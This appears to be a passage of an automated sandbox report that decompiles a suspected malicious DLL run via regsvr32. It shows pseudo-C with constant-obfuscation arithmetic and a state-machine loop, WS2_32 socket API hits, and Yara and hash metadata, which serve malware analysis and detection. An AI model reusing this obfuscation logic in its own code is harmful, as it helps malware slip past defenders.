                                                                                                                												_push(E10019C16(__ebx, __ecx, __ebp,  *(__ebp + 0xc)));
                                                                                                                												_push(E10019C16(__ebx, __ecx, __ebp, __esi));
                                                                                                                												__eax = 0;
                                                                                                                												__eflags =  *((intOrPtr*)(__edi + 0x20)) - __esi;
                                                                                                                												__eax = 0 |  *((intOrPtr*)(__edi + 0x20)) == __esi;
                                                                                                                												goto L93;
                                                                                                                											case 0x14:
                                                                                                                												_push( *(__ebp + 0xc));
                                                                                                                												__eax = E10024520(__ebx, __ecx, __edi, __esi, __eflags);
                                                                                                                												goto L76;
                                                                                                                											case 0x15:
                                                                                                                												_push( *(__ebp + 0xc));
                                                                                                                												__eax = E10022961(__ebx, __ecx, __edi, __esi, __eflags);
                                                                                                                												goto L76;
                                                                                                                											case 0x16:
                                                                                                                												__esi = __esi >> 0x10;
                                                                                                                												__eax = __ax;
                                                                                                                												_push(__ax);
                                                                                                                												__eax = __si;
                                                                                                                												_push(__si);
                                                                                                                												_push( *(__ebp + 0xc));
                                                                                                                												__eax = E10022961(__ebx, __ecx, __edi, __esi, __eflags);
                                                                                                                												goto L93;
                                                                                                                											case 0x17:
                                                                                                                												_push( *(__ebp + 0xc));
                                                                                                                												goto L75;
                                                                                                                											case 0x18:
                                                                                                                												_push(__esi);
                                                                                                                												L75:
                                                                                                                												__eax = E10019C16(__ebx, __ecx, __ebp);
                                                                                                                												L76:
                                                                                                                												_push(__eax);
                                                                                                                												goto L90;
                                                                                                                											case 0x19:
                                                                                                                												_push(__esi >> 0x10);
                                                                                                                												__eax = __si & 0x0000ffff;
                                                                                                                												goto L79;
                                                                                                                											case 0x1a:
                                                                                                                												__eax = __si;
                                                                                                                												__eflags = __esi;
                                                                                                                												__ecx = __si;
                                                                                                                												_push(__ecx);
                                                                                                                												L79:
                                                                                                                												_push(__eax);
                                                                                                                												__eax = E10019C16(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
                                                                                                                												goto L93;
                                                                                                                											case 0x1b:
                                                                                                                												_push(__esi);
                                                                                                                												__eax = E10019C16(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
                                                                                                                												L81:
                                                                                                                												_push(__eax);
                                                                                                                												goto L88;
                                                                                                                											case 0x1c:
                                                                                                                												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                                                                                                												_push( *(__ebp + 0xc) >> 0x10);
                                                                                                                												__eax = E10019C16(__ebx, __ecx, __ebp, __esi);
                                                                                                                												goto L92;
                                                                                                                											case 0x1d:
                                                                                                                												__ecx =  *(__ebp + 0xc);
                                                                                                                												__edx = __cx;
                                                                                                                												__ecx =  *(__ebp + 0xc) >> 0x10;
                                                                                                                												__eflags = __eax - 0x2a;
                                                                                                                												__ecx = __cx;
                                                                                                                												 *((intOrPtr*)(__ebp + 8)) = __edx;
                                                                                                                												 *(__ebp + 0xc) = __ecx;
                                                                                                                												if(__eax != 0x2a) {
                                                                                                                													_push(__ecx);
                                                                                                                													_push(__edx);
                                                                                                                													L88:
                                                                                                                													__ecx = __edi;
                                                                                                                													__eax =  *__ebx();
                                                                                                                													goto L106;
                                                                                                                												}
                                                                                                                												_push(E10019C16(__ebx, __ecx, __ebp, __esi));
                                                                                                                												_push( *(__ebp + 0xc));
                                                                                                                												_push( *((intOrPtr*)(__ebp + 8)));
                                                                                                                												goto L96;
                                                                                                                											case 0x1e:
                                                                                                                												_push(__esi);
                                                                                                                												L90:
                                                                                                                												__ecx = __edi;
                                                                                                                												__eax =  *__ebx();
                                                                                                                												goto L106;
                                                                                                                											case 0x1f:
                                                                                                                												_push(__esi);
                                                                                                                												_push( *(__ebp + 0xc));
                                                                                                                												__ecx = __edi;
                                                                                                                												__eax =  *__ebx();
                                                                                                                												goto L2;
                                                                                                                											case 0x20:
                                                                                                                												__eax = __si;
                                                                                                                												__eflags = __esi;
                                                                                                                												__ecx = __si;
                                                                                                                												_push(__ecx);
                                                                                                                												L42:
                                                                                                                												_push(__eax);
                                                                                                                												goto L104;
                                                                                                                											case 0x21:
                                                                                                                												__eax =  *(__ebp + 0xc);
                                                                                                                												_push(__esi);
                                                                                                                												__eax =  *(__ebp + 0xc) >> 0x10;
                                                                                                                												__eflags = __eax;
                                                                                                                												L92:
                                                                                                                												_push(__eax);
                                                                                                                												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                                                                                												L93:
                                                                                                                												_push(__eax);
                                                                                                                												goto L96;
                                                                                                                											case 0x22:
                                                                                                                												__eax = __si;
                                                                                                                												__eflags = __esi;
                                                                                                                												__ecx = __si;
                                                                                                                												_push(__si);
                                                                                                                												L95:
                                                                                                                												_push(__eax);
                                                                                                                												_push( *(__ebp + 0xc));
                                                                                                                												L96:
                                                                                                                												__ecx = __edi;
                                                                                                                												__eax =  *__ebx();
                                                                                                                												goto L106;
                                                                                                                											case 0x23:
                                                                                                                												__eax = __si;
                                                                                                                												__esi = __esi >> 0x10;
                                                                                                                												__ecx = __si;
                                                                                                                												_push(__si);
                                                                                                                												_push(__si);
                                                                                                                												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                                                                                                												_push( *(__ebp + 0xc) >> 0x10);
                                                                                                                												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                                                                                												_push( *(__ebp + 0xc) & 0x0000ffff);
                                                                                                                												__ecx = __edi;
                                                                                                                												__eax =  *__ebx();
                                                                                                                												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
                                                                                                                												L6:
                                                                                                                												__eflags = _t185;
                                                                                                                												if(_t185 != 0) {
                                                                                                                													goto L106;
                                                                                                                												}
                                                                                                                												goto L39;
                                                                                                                											case 0x24:
                                                                                                                												goto L106;
                                                                                                                											case 0x25:
                                                                                                                												__ecx = __edi;
                                                                                                                												__eax =  *__ebx();
                                                                                                                												__eflags = __eax;
                                                                                                                												 *(__ebp - 0x10) = __eax;
                                                                                                                												if(__eax == 0) {
                                                                                                                													goto L106;
                                                                                                                												}
                                                                                                                												L39:
                                                                                                                												 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
                                                                                                                												E1001887B(_t225 - 0x14);
                                                                                                                												_t163 = 0;
                                                                                                                												__eflags = 0;
                                                                                                                												goto L40;
                                                                                                                										}
                                                                                                                									}
                                                                                                                									_t170 =  *(_t225 - 0x18);
                                                                                                                									_t58 =  &(_t170[1]);
                                                                                                                									 *_t58 = _t170[1] & 0x00000000;
                                                                                                                									__eflags =  *_t58;
                                                                                                                									E1001887B(_t225 - 0x14);
                                                                                                                									goto L39;
                                                                                                                								}
                                                                                                                								_t173 = _t194;
                                                                                                                								__eflags =  *(_t225 + 0x10) - _t173[2];
                                                                                                                								if( *(_t225 + 0x10) != _t173[2]) {
                                                                                                                									goto L25;
                                                                                                                								}
                                                                                                                								_t196 = _t173[1];
                                                                                                                								 *(_t225 + 0x10) = _t196;
                                                                                                                								E1001887B(_t225 - 0x14);
                                                                                                                								__eflags = _t196;
                                                                                                                								if(_t196 == 0) {
                                                                                                                									goto L39;
                                                                                                                								}
                                                                                                                								__eflags =  *(_t225 + 8) - 0xc000;
                                                                                                                								if( *(_t225 + 8) < 0xc000) {
                                                                                                                									goto L29;
                                                                                                                								}
                                                                                                                								goto L102;
                                                                                                                							}
                                                                                                                							__eflags =  *(_t147 + 0x74);
                                                                                                                							if( *(_t147 + 0x74) <= 0) {
                                                                                                                								goto L20;
                                                                                                                							}
                                                                                                                							__eflags = _t189 - 0x200;
                                                                                                                							if(_t189 < 0x200) {
                                                                                                                								L16:
                                                                                                                								__eflags = _t189 - 0x100;
                                                                                                                								if(_t189 < 0x100) {
                                                                                                                									L18:
                                                                                                                									__eflags = _t189 - 0x281 - 0x10;
                                                                                                                									if(_t189 - 0x281 > 0x10) {
                                                                                                                										goto L20;
                                                                                                                									}
                                                                                                                									L19:
                                                                                                                									_t177 =  *((intOrPtr*)( *( *(_t222 + 0x4c)) + 0x94))(_t189,  *((intOrPtr*)(_t225 + 0xc)), _t224, _t225 - 0x10);
                                                                                                                									__eflags = _t177;
                                                                                                                									if(_t177 != 0) {
                                                                                                                										goto L106;
                                                                                                                									}
                                                                                                                									goto L20;
                                                                                                                								}
                                                                                                                								__eflags = _t189 - 0x10f;
                                                                                                                								if(_t189 <= 0x10f) {
                                                                                                                									goto L19;
                                                                                                                								}
                                                                                                                								goto L18;
                                                                                                                							}
                                                                                                                							__eflags = _t189 - 0x209;
                                                                                                                							if(_t189 <= 0x209) {
                                                                                                                								goto L19;
                                                                                                                							}
                                                                                                                							goto L16;
                                                                                                                						} else {
                                                                                                                							_t181 = E1001B3E9(_t189, _t222, _t222, _t224, _t224 >> 0x10);
                                                                                                                							__eflags = _t181;
                                                                                                                							if(_t181 != 0) {
                                                                                                                								L2:
                                                                                                                								 *((intOrPtr*)(_t225 - 0x10)) = 1;
                                                                                                                								L106:
                                                                                                                								_t160 =  *((intOrPtr*)(_t225 + 0x14));
                                                                                                                								if(_t160 != 0) {
                                                                                                                									 *_t160 =  *((intOrPtr*)(_t225 - 0x10));
                                                                                                                								}
                                                                                                                								 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
                                                                                                                								E1001887B(_t225 - 0x14);
                                                                                                                								_t163 = 1;
                                                                                                                								L40:
                                                                                                                								return E1003D2BE(_t163);
                                                                                                                							}
                                                                                                                							goto L12;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t217 =  *(_t225 + 0x10);
                                                                                                                					__eflags =  *_t217;
                                                                                                                					if( *_t217 == 0) {
                                                                                                                						goto L39;
                                                                                                                					}
                                                                                                                					_push(_t225 - 0x10);
                                                                                                                					_push(_t217);
                                                                                                                					_push( *((intOrPtr*)(_t225 + 0xc)));
                                                                                                                					_t185 =  *((intOrPtr*)( *__ecx + 0xec))();
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                				_push( *(_t225 + 0x10));
                                                                                                                				_push( *((intOrPtr*)(_t225 + 0xc)));
                                                                                                                				if( *((intOrPtr*)( *__ecx + 0xe8))() == 0) {
                                                                                                                					goto L39;
                                                                                                                				}
                                                                                                                				goto L2;
                                                                                                                			}

























                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bc00
                                                                                                                0x1001be09
                                                                                                                0x1001be09
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bbf1
                                                                                                                0x1001bbf3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bd52
                                                                                                                0x1001bd59
                                                                                                                0x1001bd5a
                                                                                                                0x1001bd5c
                                                                                                                0x1001bd5f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bd67
                                                                                                                0x1001bd6a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bd71
                                                                                                                0x1001bd74
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bd7d
                                                                                                                0x1001bd80
                                                                                                                0x1001bd83
                                                                                                                0x1001bd84
                                                                                                                0x1001bd87
                                                                                                                0x1001bd88
                                                                                                                0x1001bd8b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bd95
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bd9a
                                                                                                                0x1001bd9b
                                                                                                                0x1001bd9b
                                                                                                                0x1001bda0
                                                                                                                0x1001bda0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bda8
                                                                                                                0x1001bda9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bdae
                                                                                                                0x1001bdb1
                                                                                                                0x1001bdb4
                                                                                                                0x1001bdb7
                                                                                                                0x1001bdb8
                                                                                                                0x1001bdb8
                                                                                                                0x1001bdbc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bdc3
                                                                                                                0x1001bdc7
                                                                                                                0x1001bdcc
                                                                                                                0x1001bdcc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bdd2
                                                                                                                0x1001bdd5
                                                                                                                0x1001bdd7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bdde
                                                                                                                0x1001bde1
                                                                                                                0x1001bde4
                                                                                                                0x1001bde7
                                                                                                                0x1001bdea
                                                                                                                0x1001bded
                                                                                                                0x1001bdf0
                                                                                                                0x1001bdf3
                                                                                                                0x1001be04
                                                                                                                0x1001be05
                                                                                                                0x1001be0c
                                                                                                                0x1001be0c
                                                                                                                0x1001be0e
                                                                                                                0x00000000
                                                                                                                0x1001be0e
                                                                                                                0x1001bdfb
                                                                                                                0x1001bdfc
                                                                                                                0x1001bdff
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001be15
                                                                                                                0x1001be16
                                                                                                                0x1001be16
                                                                                                                0x1001be18
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001be3f
                                                                                                                0x1001be40
                                                                                                                0x1001be43
                                                                                                                0x1001be45
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bbca
                                                                                                                0x1001bbcd
                                                                                                                0x1001bbd0
                                                                                                                0x1001bbd3
                                                                                                                0x1001bbd4
                                                                                                                0x1001bbd4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001be1c
                                                                                                                0x1001be1f
                                                                                                                0x1001be20
                                                                                                                0x1001be20
                                                                                                                0x1001be23
                                                                                                                0x1001be23
                                                                                                                0x1001be24
                                                                                                                0x1001be28
                                                                                                                0x1001be28
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001be2b
                                                                                                                0x1001be2e
                                                                                                                0x1001be31
                                                                                                                0x1001be34
                                                                                                                0x1001be35
                                                                                                                0x1001be35
                                                                                                                0x1001be36
                                                                                                                0x1001be39
                                                                                                                0x1001be39
                                                                                                                0x1001be3b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001be4c
                                                                                                                0x1001be4f
                                                                                                                0x1001be52
                                                                                                                0x1001be55
                                                                                                                0x1001be56
                                                                                                                0x1001be5a
                                                                                                                0x1001be5d
                                                                                                                0x1001be5e
                                                                                                                0x1001be62
                                                                                                                0x1001be63
                                                                                                                0x1001be65
                                                                                                                0x1001be67
                                                                                                                0x1001ba10
                                                                                                                0x1001ba10
                                                                                                                0x1001ba12
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001be6f
                                                                                                                0x1001be71
                                                                                                                0x1001be73
                                                                                                                0x1001be75
                                                                                                                0x1001be78
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bbb4
                                                                                                                0x1001bbb4
                                                                                                                0x1001bbbb
                                                                                                                0x1001bbc0
                                                                                                                0x1001bbc0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bb57
                                                                                                                0x1001bba5
                                                                                                                0x1001bba8
                                                                                                                0x1001bba8
                                                                                                                0x1001bba8
                                                                                                                0x1001bbaf
                                                                                                                0x00000000
                                                                                                                0x1001bbaf
                                                                                                                0x1001bad7
                                                                                                                0x1001bad9
                                                                                                                0x1001badc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bade
                                                                                                                0x1001bae4
                                                                                                                0x1001bae7
                                                                                                                0x1001baec
                                                                                                                0x1001baee
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001baf4
                                                                                                                0x1001bafb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bafd
                                                                                                                0x1001ba55
                                                                                                                0x1001ba59
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001ba5b
                                                                                                                0x1001ba61
                                                                                                                0x1001ba6b
                                                                                                                0x1001ba6b
                                                                                                                0x1001ba71
                                                                                                                0x1001ba7b
                                                                                                                0x1001ba81
                                                                                                                0x1001ba84
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001ba86
                                                                                                                0x1001ba94
                                                                                                                0x1001ba9a
                                                                                                                0x1001ba9c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001ba9c
                                                                                                                0x1001ba73
                                                                                                                0x1001ba79
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001ba79
                                                                                                                0x1001ba63
                                                                                                                0x1001ba69
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001ba3a

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 431132790-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • bind.WS2_32(?,00000002,00000002), ref: 10028486
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: bind
                                                                                                                • String ID:
                                                                                                                • API String ID: 1187836755-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • recv.WS2_32(?,00000000,00000000,00000000), ref: 1002819D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: recv
                                                                                                                • String ID:
                                                                                                                • API String ID: 1507349165-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 98%
                                                                                                                			E001B35A3(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                				intOrPtr _v4;
                                                                                                                				intOrPtr* _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				char _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				unsigned int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int _v84;
                                                                                                                				signed int _v88;
                                                                                                                				signed int _v92;
                                                                                                                				signed int _v96;
                                                                                                                				signed int _v100;
                                                                                                                				signed int _v104;
                                                                                                                				unsigned int _v108;
                                                                                                                				intOrPtr* _t203;
                                                                                                                				intOrPtr _t216;
                                                                                                                				intOrPtr _t217;
                                                                                                                				signed int _t219;
                                                                                                                				intOrPtr _t222;
                                                                                                                				intOrPtr _t223;
                                                                                                                				signed int _t235;
                                                                                                                				signed int _t236;
                                                                                                                				intOrPtr _t237;
                                                                                                                				void* _t239;
                                                                                                                				signed int _t240;
                                                                                                                				intOrPtr _t241;
                                                                                                                				intOrPtr _t242;
                                                                                                                				unsigned int* _t243;
                                                                                                                				unsigned int* _t244;
                                                                                                                
                                                                                                                				_t217 = __ecx;
                                                                                                                				_t243 =  &_v108;
                                                                                                                				_v8 = __edx;
                                                                                                                				_v20 = __ecx;
                                                                                                                				_v72 = 0x18176e;
                                                                                                                				_v72 = _v72 + 0xffff02a3;
                                                                                                                				_v72 = _v72 * 0x28;
                                                                                                                				_t239 = 0xcc5ade;
                                                                                                                				_v72 = _v72 ^ 0x039c12a8;
                                                                                                                				_v60 = 0x6d2ba0;
                                                                                                                				_v60 = _v60 ^ 0xc8285a6b;
                                                                                                                				_v60 = _v60 ^ 0xc845d405;
                                                                                                                				_v64 = 0xbfee22;
                                                                                                                				_v64 = _v64 << 6;
                                                                                                                				_v64 = _v64 ^ 0x2ff37afc;
                                                                                                                				_v68 = 0xb8022b;
                                                                                                                				_v68 = _v68 >> 3;
                                                                                                                				_v68 = _v68 ^ 0x00180df7;
                                                                                                                				_v108 = 0x514a92;
                                                                                                                				_v108 = _v108 ^ 0xa60b3804;
                                                                                                                				_v108 = _v108 | 0x7264c8f2;
                                                                                                                				_v108 = _v108 >> 9;
                                                                                                                				_v108 = _v108 ^ 0x007f5af6;
                                                                                                                				_v104 = 0x9f02d8;
                                                                                                                				_v104 = _v104 + 0x80eb;
                                                                                                                				_v104 = _v104 | 0x2da237b4;
                                                                                                                				_v104 = _v104 ^ 0xf9b80a62;
                                                                                                                				_v104 = _v104 ^ 0xd40cea05;
                                                                                                                				_v48 = 0x41095b;
                                                                                                                				_v48 = _v48 ^ 0xe7cb629b;
                                                                                                                				_v48 = _v48 ^ 0xe789d2b9;
                                                                                                                				_v52 = 0xe0dbae;
                                                                                                                				_v52 = _v52 + 0xffffe101;
                                                                                                                				_v52 = _v52 ^ 0x00eb1eca;
                                                                                                                				_v56 = 0xdb8bf1;
                                                                                                                				_t235 = 0x62;
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v56 = _v56 / _t235;
                                                                                                                				_v56 = _v56 ^ 0x000d7cf8;
                                                                                                                				_v92 = 0x30af14;
                                                                                                                				_v92 = _v92 + 0x9d27;
                                                                                                                				_v92 = _v92 + 0xfffff8f2;
                                                                                                                				_v92 = _v92 << 0xe;
                                                                                                                				_v92 = _v92 ^ 0x5142f68a;
                                                                                                                				_v44 = 0x9e1c18;
                                                                                                                				_v44 = _v44 + 0xffffb872;
                                                                                                                				_v44 = _v44 ^ 0x009a00d0;
                                                                                                                				_v96 = 0xaed889;
                                                                                                                				_v96 = _v96 | 0x8a23a869;
                                                                                                                				_t236 = 0x47;
                                                                                                                				_v96 = _v96 * 0x28;
                                                                                                                				_v96 = _v96 << 4;
                                                                                                                				_v96 = _v96 ^ 0xb7ed64c0;
                                                                                                                				_v100 = 0x57df08;
                                                                                                                				_v100 = _v100 + 0xcb9c;
                                                                                                                				_v100 = _v100 << 0x10;
                                                                                                                				_v100 = _v100 + 0x59cb;
                                                                                                                				_v100 = _v100 ^ 0xaaab0961;
                                                                                                                				_v36 = 0xb6304c;
                                                                                                                				_v36 = _v36 | 0xc9bce40a;
                                                                                                                				_v36 = _v36 ^ 0xc9b68fdf;
                                                                                                                				_v76 = 0xa4d90f;
                                                                                                                				_v76 = _v76 * 7;
                                                                                                                				_v76 = _v76 + 0x1d90;
                                                                                                                				_v76 = _v76 ^ 0x04850091;
                                                                                                                				_v40 = 0xbbd16e;
                                                                                                                				_v40 = _v40 + 0xffffd9dd;
                                                                                                                				_v40 = _v40 ^ 0x00bcead5;
                                                                                                                				_v84 = 0x3e6012;
                                                                                                                				_t242 = _v8;
                                                                                                                				_v84 = _v84 / _t236;
                                                                                                                				_v84 = _v84 >> 0xf;
                                                                                                                				_t237 = _v4;
                                                                                                                				_t216 = _v8;
                                                                                                                				_v84 = _v84 * 0x28;
                                                                                                                				_v84 = _v84 ^ 0x00087ad1;
                                                                                                                				_v88 = 0xd18c9c;
                                                                                                                				_v88 = _v88 ^ 0x98cb43ad;
                                                                                                                				_v88 = _v88 >> 2;
                                                                                                                				_v88 = _v88 * 0x62;
                                                                                                                				_v88 = _v88 ^ 0x8e90d09f;
                                                                                                                				_t198 = _v28;
                                                                                                                				_v80 = 0x50b24f;
                                                                                                                				_v80 = _v80 + 0xfffff7da;
                                                                                                                				_v80 = _v80 >> 4;
                                                                                                                				_v80 = _v80 + 0xdd34;
                                                                                                                				_v80 = _v80 ^ 0x000de38c;
                                                                                                                				_v32 = 0xa82c31;
                                                                                                                				_v32 = _v32 << 4;
                                                                                                                				_v32 = _v32 ^ 0x0a8f67d3;
                                                                                                                				while(_t239 != 0xcc5ade) {
                                                                                                                					if(_t239 == 0xb71bd21) {
                                                                                                                						_t219 = E001B19B1(_v104,  &_v16, _v48, _v52, _t242, _t217, _t198, _v56);
                                                                                                                						_t243 =  &(_t243[6]);
                                                                                                                						_v24 = _t219;
                                                                                                                						if(_t219 == 0) {
                                                                                                                							_t240 = _v24;
                                                                                                                							goto L19;
                                                                                                                						} else {
                                                                                                                							_t222 = _v16;
                                                                                                                							if(_t222 == 0) {
                                                                                                                								goto L15;
                                                                                                                							} else {
                                                                                                                								_t198 = _v28 + _t222;
                                                                                                                								_v28 = _v28 + _t222;
                                                                                                                								_t242 = _t242 - _t222;
                                                                                                                								if(_t242 != 0) {
                                                                                                                									goto L6;
                                                                                                                								} else {
                                                                                                                									_t223 = _t237 + _t237;
                                                                                                                									_push(_t223);
                                                                                                                									_v12 = _t223;
                                                                                                                									_t241 = E001A303A(_t223, _t223);
                                                                                                                									_t244 =  &(_t243[3]);
                                                                                                                									if(_t241 == 0) {
                                                                                                                										goto L15;
                                                                                                                									} else {
                                                                                                                										E001BFD42(_t237, _v36, _t216, _v76, _t241, _v40);
                                                                                                                										E001B17D2(_v84, _v88, _t216);
                                                                                                                										_t242 = _t237;
                                                                                                                										_t198 = _t241 + _t237;
                                                                                                                										_t237 = _v12;
                                                                                                                										_t243 =  &(_t244[5]);
                                                                                                                										_v28 = _t198;
                                                                                                                										_t216 = _t241;
                                                                                                                										if(_t242 == 0) {
                                                                                                                											goto L15;
                                                                                                                										} else {
                                                                                                                											goto L6;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						if(_t239 != 0xe2c6127) {
                                                                                                                							L14:
                                                                                                                							if(_t239 != 0x888cc21) {
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                								goto L15;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_t237 = 0x10000;
                                                                                                                							_push(_t217);
                                                                                                                							_t198 = E001A303A(_t217, 0x10000);
                                                                                                                							_t216 = _t198;
                                                                                                                							_t243 =  &(_t243[3]);
                                                                                                                							if(_t216 == 0) {
                                                                                                                								L15:
                                                                                                                								_t240 = _v24;
                                                                                                                								if(_t240 == 0) {
                                                                                                                									L19:
                                                                                                                									E001B17D2(_v80, _v32, _t216);
                                                                                                                								} else {
                                                                                                                									_t203 = _v8;
                                                                                                                									 *_t203 = _t216;
                                                                                                                									 *((intOrPtr*)(_t203 + 4)) = _t237 - _t242;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								_v28 = _t198;
                                                                                                                								_t242 = 0x10000;
                                                                                                                								L6:
                                                                                                                								_t217 = _v20;
                                                                                                                								_t239 = 0xb71bd21;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					return _t240;
                                                                                                                				}
                                                                                                                				_t239 = 0xe2c6127;
                                                                                                                				goto L14;
                                                                                                                			}














































                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: [A
                                                                                                                • API String ID: 0-1337053708
                                                                                                                • Opcode ID: 2df50b8a457a62284f47b4bef2842306c5353f661bbadacc302428e25ed516ad
                                                                                                                • Instruction ID: c3e6c28b61007d024307e852ad768ff699f18ae79b750be66c347c296042f5ec
                                                                                                                • Opcode Fuzzy Hash: 2df50b8a457a62284f47b4bef2842306c5353f661bbadacc302428e25ed516ad
